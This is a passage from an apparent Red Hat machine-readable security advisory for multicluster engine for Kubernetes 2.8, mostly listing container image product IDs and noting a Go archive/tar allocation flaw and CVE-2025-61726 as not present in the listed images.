"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map"
},
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
